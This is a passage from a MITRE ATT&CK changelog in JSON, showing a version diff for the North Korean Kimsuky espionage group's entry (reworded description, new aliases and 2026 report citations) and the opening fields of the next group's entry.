                            "description": "Lesnewich, G. et al. (2024, April 16). From Social Engineering to DMARC Abuse: TA427\u2019s Art of Information Gathering. Retrieved May 3, 2024.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering"
                        },
                        {
                            "source_name": "Mandiant APT43 March 2024",
                            "description": "Mandiant. (2024, March 14). APT43: North Korean Group Uses Cybercrime to Fund Espionage Operations. Retrieved May 3, 2024.",
                            "url": "https://services.google.com/fh/files/misc/apt43-report-en.pdf"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "MSFT-AI",
                            "description": "Microsoft Threat Intelligence. (2024, February 14). Staying ahead of threat actors in the age of AI. Retrieved March 11, 2024.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/"
                        },
                        {
                            "source_name": "Rapid7 Threat Landscape Actors March 2026",
                            "description": "Rapid7. (2026, March 18). 2026 GLOBAL  THREAT LANDSCAPE  REPORT: Decoding the Accelerated Cyber Attack Cycle. Retrieved April 18, 2026.",
                            "url": "https://www.rapid7.com/cdn/assets/bltc1ddd6561ab54a26/69ba67de50ca691edcd3f5b7/rapid7-threat-landscape-report-2026.pdf"
                        },
                        {
                            "source_name": "Symantec Troll Stealer 2024",
                            "description": "Symantec Threat Hunter Team. (2024, May 16). Springtail: New Linux Backdoor Added to Toolkit. Retrieved January 17, 2025.",
                            "url": "https://www.security.com/threat-intelligence/springtail-kimsuky-backdoor-espionage"
                        },
                        {
                            "source_name": "Securelist Kimsuky Sept 2013",
                            "description": "Tarakanov , D.. (2013, September 11). The \u201cKimsuky\u201d Operation: A North Korean APT?. Retrieved August 13, 2019.",
                            "url": "https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/"
                        },
                        {
                            "source_name": "ThreatConnect Kimsuky September 2020",
                            "description": "ThreatConnect. (2020, September 28). Kimsuky Phishing Operations Putting In Work. Retrieved October 30, 2020.",
                            "url": "https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dongwook Kim, KISA",
                        "Jaesang Oh, KC7 Foundation",
                        "Taewoo Lee, KISA",
                        "Wai Linn Oo, Kernellix Co.,Ltd."
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "5.2",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:46:50.938000+00:00\", \"old_value\": \"2025-11-12 18:55:12.319000+00:00\"}, \"root['description']\": {\"new_value\": \"[Kimsuky](https://attack.mitre.org/groups/G0094) is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. [Kimsuky](https://attack.mitre.org/groups/G0094) operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing.(Citation: EST Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024) \\n\\n[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019) In 2023, [Kimsuky](https://attack.mitre.org/groups/G0094) was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance.(Citation: MSFT-AI)\\n\\nDPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under [Lazarus Group](https://attack.mitre.org/groups/G0032), rather than tracking operationally distinct subgroups.\", \"old_value\": \"[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. Its operations have overlapped with other DPRK actors, likely due to ad hoc collaboration or limited resource sharing.(Citation: EST Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024) Because of overlapping operations, some researchers group a wide range of North Korean state-sponsored cyber activity under the broader [Lazarus Group](https://attack.mitre.org/groups/G0032) umbrella rather than tracking separate subgroup or cluster distinctions.\\n\\n[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)\\n\\nIn 2023, [Kimsuky](https://attack.mitre.org/groups/G0094) was observed using commercial large language models to assist with vulnerability research, scripting, social engineering and reconnaissance.(Citation: MSFT-AI)\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n-[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. Its operations have overlapped with other DPRK actors, likely due to ad hoc collaboration or limited resource sharing.(Citation: EST Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024) Because of overlapping operations, some researchers group a wide range of North Korean state-sponsored cyber activity under the broader [Lazarus Group](https://attack.mitre.org/groups/G0032) umbrella rather than tracking separate subgroup or cluster distinctions.\\n+[Kimsuky](https://attack.mitre.org/groups/G0094) is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. [Kimsuky](https://attack.mitre.org/groups/G0094) operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing.(Citation: EST Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)(Citation: Mandiant APT43 March 2024)(Citation: Proofpoint TA427 April 2024) \\n \\n-[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)\\n+[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019) In 2023, [Kimsuky](https://attack.mitre.org/groups/G0094) was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance.(Citation: MSFT-AI)\\n \\n-In 2023, [Kimsuky](https://attack.mitre.org/groups/G0094) was observed using commercial large language models to assist with vulnerability research, scripting, social engineering and reconnaissance.(Citation: MSFT-AI)\\n+DPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under [Lazarus Group](https://attack.mitre.org/groups/G0032), rather than tracking operationally distinct subgroups.\"}, \"root['x_mitre_version']\": {\"new_value\": \"5.2\", \"old_value\": \"5.1\"}, \"root['x_mitre_contributors'][3]\": {\"new_value\": \"Wai Linn Oo, Kernellix Co.,Ltd.\", \"old_value\": \"Wai Linn Oo @ Kernellix\"}}, \"iterable_item_added\": {\"root['aliases'][8]\": \"Earth Kumiho\", \"root['aliases'][9]\": \"PatheticSlug\", \"root['external_references'][1]\": {\"source_name\": \"Cloudflare 2026 Threat Report New Threat Actors March 2026\", \"description\": \" Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.\", \"url\": \"https://blog.cloudflare.com/2026-threat-report/\"}, \"root['external_references'][2]\": {\"source_name\": \"PatheticSlug\", \"description\": \"(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)\"}, \"root['external_references'][8]\": {\"source_name\": \"Earth Kumiho\", \"description\": \"(Citation: Rapid7 Threat Landscape Actors March 2026)\"}, \"root['external_references'][24]\": {\"source_name\": \"Rapid7 Threat Landscape Actors March 2026\", \"description\": \"Rapid7. (2026, March 18). 2026 GLOBAL  THREAT LANDSCAPE  REPORT: Decoding the Accelerated Cyber Attack Cycle. Retrieved April 18, 2026.\", \"url\": \"https://www.rapid7.com/cdn/assets/bltc1ddd6561ab54a26/69ba67de50ca691edcd3f5b7/rapid7-threat-landscape-report-2026.pdf\"}, \"root['x_mitre_domains'][1]\": \"mobile-attack\"}}",
                    "previous_version": "5.1",
                    "version_change": "5.1 \u2192 5.2",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to47__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to47__0\"><a href=\"#difflib_chg_to47__top\">t</a></td><td class=\"diff_header\" id=\"from47_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">[Kimsuky](https://attack.mitre.org/groups/G0094)&nbsp;is&nbsp;a&nbsp;North&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to47__top\">t</a></td><td class=\"diff_header\" id=\"to47_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">[Kimsuky](https://attack.mitre.org/groups/G0094)&nbsp;is&nbsp;a&nbsp;Democr</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Korea-based&nbsp;cyber&nbsp;espionage&nbsp;group&nbsp;that&nbsp;has&nbsp;been&nbsp;active&nbsp;since</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">atic&nbsp;People's&nbsp;Republic&nbsp;of&nbsp;Korea&nbsp;(DPRK)-based&nbsp;cyber&nbsp;espionage</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;at&nbsp;least&nbsp;2012.&nbsp;The&nbsp;group&nbsp;initially&nbsp;targeted&nbsp;South&nbsp;Korean&nbsp;go</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;group&nbsp;that&nbsp;has&nbsp;been&nbsp;active&nbsp;since&nbsp;at&nbsp;least&nbsp;2012.&nbsp;The&nbsp;group&nbsp;i</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">vernment&nbsp;agencies,&nbsp;think&nbsp;tanks,&nbsp;and&nbsp;subject-matter&nbsp;experts&nbsp;i</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nitially&nbsp;targeted&nbsp;South&nbsp;Korean&nbsp;government&nbsp;agencies,&nbsp;think&nbsp;ta</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">n&nbsp;various&nbsp;fields.&nbsp;Its&nbsp;operations&nbsp;expanded&nbsp;to&nbsp;include&nbsp;the&nbsp;Uni</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nks,&nbsp;and&nbsp;subject-matter&nbsp;experts&nbsp;in&nbsp;various&nbsp;fields.&nbsp;Its&nbsp;opera</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ted&nbsp;Nations&nbsp;and&nbsp;organizations&nbsp;in&nbsp;the&nbsp;government,&nbsp;education,&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tions&nbsp;expanded&nbsp;to&nbsp;include&nbsp;the&nbsp;United&nbsp;Nations&nbsp;and&nbsp;organizatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">business&nbsp;services,&nbsp;and&nbsp;manufacturing&nbsp;sectors&nbsp;across&nbsp;the&nbsp;Unit</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ns&nbsp;in&nbsp;the&nbsp;government,&nbsp;education,&nbsp;business&nbsp;services,&nbsp;and&nbsp;manu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ed&nbsp;States,&nbsp;Japan,&nbsp;Russia,&nbsp;and&nbsp;Europe.&nbsp;[Kimsuky](https://atta</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">facturing&nbsp;sectors&nbsp;across&nbsp;the&nbsp;United&nbsp;States,&nbsp;Japan,&nbsp;Russia,&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ck.mitre.org/groups/G0094)&nbsp;has&nbsp;focused&nbsp;collection&nbsp;on&nbsp;foreign</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nd&nbsp;Europe.&nbsp;[Kimsuky](https://attack.mitre.org/groups/G0094)&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;policy&nbsp;and&nbsp;national&nbsp;security&nbsp;issues&nbsp;tied&nbsp;to&nbsp;the&nbsp;Korean&nbsp;Peni</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">has&nbsp;focused&nbsp;collection&nbsp;on&nbsp;foreign&nbsp;policy&nbsp;and&nbsp;national&nbsp;securi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nsula,&nbsp;nuclear&nbsp;policy,&nbsp;and&nbsp;sanctions.&nbsp;Its&nbsp;operations&nbsp;have&nbsp;ov</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ty&nbsp;issues&nbsp;tied&nbsp;to&nbsp;the&nbsp;Korean&nbsp;Peninsula,&nbsp;nuclear&nbsp;policy,&nbsp;and&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">erlapped&nbsp;with&nbsp;other&nbsp;DPRK&nbsp;actors,&nbsp;likely&nbsp;due&nbsp;to&nbsp;ad&nbsp;hoc&nbsp;collab</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sanctions.&nbsp;[Kimsuky](https://attack.mitre.org/groups/G0094)&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">oration&nbsp;or&nbsp;limited&nbsp;resource&nbsp;sharing.(Citation:&nbsp;EST&nbsp;Kimsuky&nbsp;A</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">operations&nbsp;have&nbsp;overlapped&nbsp;with&nbsp;those&nbsp;of&nbsp;other&nbsp;North&nbsp;Korean&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">pril&nbsp;2019)(Citation:&nbsp;Cybereason&nbsp;Kimsuky&nbsp;November&nbsp;2020)(Citat</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">state-sponsored&nbsp;cyber&nbsp;espionage&nbsp;actors&nbsp;as&nbsp;a&nbsp;result&nbsp;of&nbsp;ad&nbsp;hoc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ion:&nbsp;Malwarebytes&nbsp;Kimsuky&nbsp;June&nbsp;2021)(Citation:&nbsp;CISA&nbsp;AA20-301</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;collaborations&nbsp;or&nbsp;other&nbsp;limited&nbsp;resource&nbsp;sharing.(Citation:</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">A&nbsp;Kimsuky)(Citation:&nbsp;Mandiant&nbsp;APT43&nbsp;March&nbsp;2024)(Citation:&nbsp;Pr</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;EST&nbsp;Kimsuky&nbsp;April&nbsp;2019)(Citation:&nbsp;Cybereason&nbsp;Kimsuky&nbsp;Novemb</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">oofpoint&nbsp;TA427&nbsp;April&nbsp;2024)&nbsp;Because&nbsp;of&nbsp;overlapping&nbsp;operations</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er&nbsp;2020)(Citation:&nbsp;Malwarebytes&nbsp;Kimsuky&nbsp;June&nbsp;2021)(Citation:</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">,&nbsp;some&nbsp;researchers&nbsp;group&nbsp;a&nbsp;wide&nbsp;range&nbsp;of&nbsp;North&nbsp;Korean&nbsp;state-</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;CISA&nbsp;AA20-301A&nbsp;Kimsuky)(Citation:&nbsp;Mandiant&nbsp;APT43&nbsp;March&nbsp;2024</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sponsored&nbsp;cyber&nbsp;activity&nbsp;under&nbsp;the&nbsp;broader&nbsp;[Lazarus&nbsp;Group](h</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">)(Citation:&nbsp;Proofpoint&nbsp;TA427&nbsp;April&nbsp;2024)&nbsp;&nbsp;&nbsp;[Kimsuky](https:/</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ttps://attack.mitre.org/groups/G0032)&nbsp;umbrella&nbsp;rather&nbsp;than&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">/attack.mitre.org/groups/G0094)&nbsp;was&nbsp;assessed&nbsp;to&nbsp;be&nbsp;responsib</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">racking&nbsp;separate&nbsp;subgroup&nbsp;or&nbsp;cluster&nbsp;distinctions.&nbsp;&nbsp;[Kimsuky</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">le&nbsp;for&nbsp;the&nbsp;2014&nbsp;Korea&nbsp;Hydro&nbsp;&amp;&nbsp;Nuclear&nbsp;Power&nbsp;Co.&nbsp;compromise;&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">](https://attack.mitre.org/groups/G0094)&nbsp;was&nbsp;assessed&nbsp;to&nbsp;be&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">other&nbsp;notable&nbsp;campaigns&nbsp;include&nbsp;Operation&nbsp;STOLEN&nbsp;PENCIL&nbsp;(201</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">responsible&nbsp;for&nbsp;the&nbsp;2014&nbsp;Korea&nbsp;Hydro&nbsp;&amp;&nbsp;Nuclear&nbsp;Power&nbsp;Co.&nbsp;com</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">8),&nbsp;Operation&nbsp;Kabar&nbsp;Cobra&nbsp;(2019),&nbsp;and&nbsp;Operation&nbsp;Smoke&nbsp;Screen</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">promise;&nbsp;other&nbsp;notable&nbsp;campaigns&nbsp;include&nbsp;Operation&nbsp;STOLEN&nbsp;PE</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;(2019).(Citation:&nbsp;Netscout&nbsp;Stolen&nbsp;Pencil&nbsp;Dec&nbsp;2018)(Citation</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">NCIL&nbsp;(2018),&nbsp;Operation&nbsp;Kabar&nbsp;Cobra&nbsp;(2019),&nbsp;and&nbsp;Operation&nbsp;Smo</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">:&nbsp;EST&nbsp;Kimsuky&nbsp;SmokeScreen&nbsp;April&nbsp;2019)(Citation:&nbsp;AhnLab&nbsp;Kimsu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ke&nbsp;Screen&nbsp;(2019).(Citation:&nbsp;Netscout&nbsp;Stolen&nbsp;Pencil&nbsp;Dec&nbsp;2018)</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ky&nbsp;Kabar&nbsp;Cobra&nbsp;Feb&nbsp;2019)&nbsp;In&nbsp;2023,&nbsp;[Kimsuky](https://attack.m</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">(Citation:&nbsp;EST&nbsp;Kimsuky&nbsp;SmokeScreen&nbsp;April&nbsp;2019)(Citation:&nbsp;Ahn</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">itre.org/groups/G0094)&nbsp;was&nbsp;observed&nbsp;using&nbsp;commercial&nbsp;large&nbsp;l</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Lab&nbsp;Kimsuky&nbsp;Kabar&nbsp;Cobra&nbsp;Feb&nbsp;2019)&nbsp;&nbsp;In&nbsp;2023,&nbsp;[Kimsuky](https:</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">anguage&nbsp;models&nbsp;(LLMs)&nbsp;to&nbsp;assist&nbsp;with&nbsp;vulnerability&nbsp;research,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">//attack.mitre.org/groups/G0094)&nbsp;was&nbsp;observed&nbsp;using&nbsp;commerci</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;scripting,&nbsp;social&nbsp;engineering&nbsp;and&nbsp;reconnaissance.(Citation:</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">al&nbsp;large&nbsp;language&nbsp;models&nbsp;to&nbsp;assist&nbsp;with&nbsp;vulnerability&nbsp;resear</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;MSFT-AI)&nbsp;&nbsp;DPRK&nbsp;threat&nbsp;actor&nbsp;cluster&nbsp;boundaries&nbsp;overlap&nbsp;in&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ch,&nbsp;scripting,&nbsp;social&nbsp;engineering&nbsp;and&nbsp;reconnaissance.(Citati</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pen&nbsp;source&nbsp;reporting,&nbsp;with&nbsp;some&nbsp;security&nbsp;researchers&nbsp;consoli</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on:&nbsp;MSFT-AI)</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">dating&nbsp;all&nbsp;attributed&nbsp;North&nbsp;Korean&nbsp;state-sponsored&nbsp;cyber&nbsp;act</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ivity&nbsp;under&nbsp;[Lazarus&nbsp;Group](https://attack.mitre.org/groups/</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">G0032),&nbsp;rather&nbsp;than&nbsp;tracking&nbsp;operationally&nbsp;distinct&nbsp;subgroup</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-05-12 18:15:29.396000+00:00",
                    "modified": "2026-01-20 16:26:04.859000+00:00",
                    "name": "Wizard Spider",
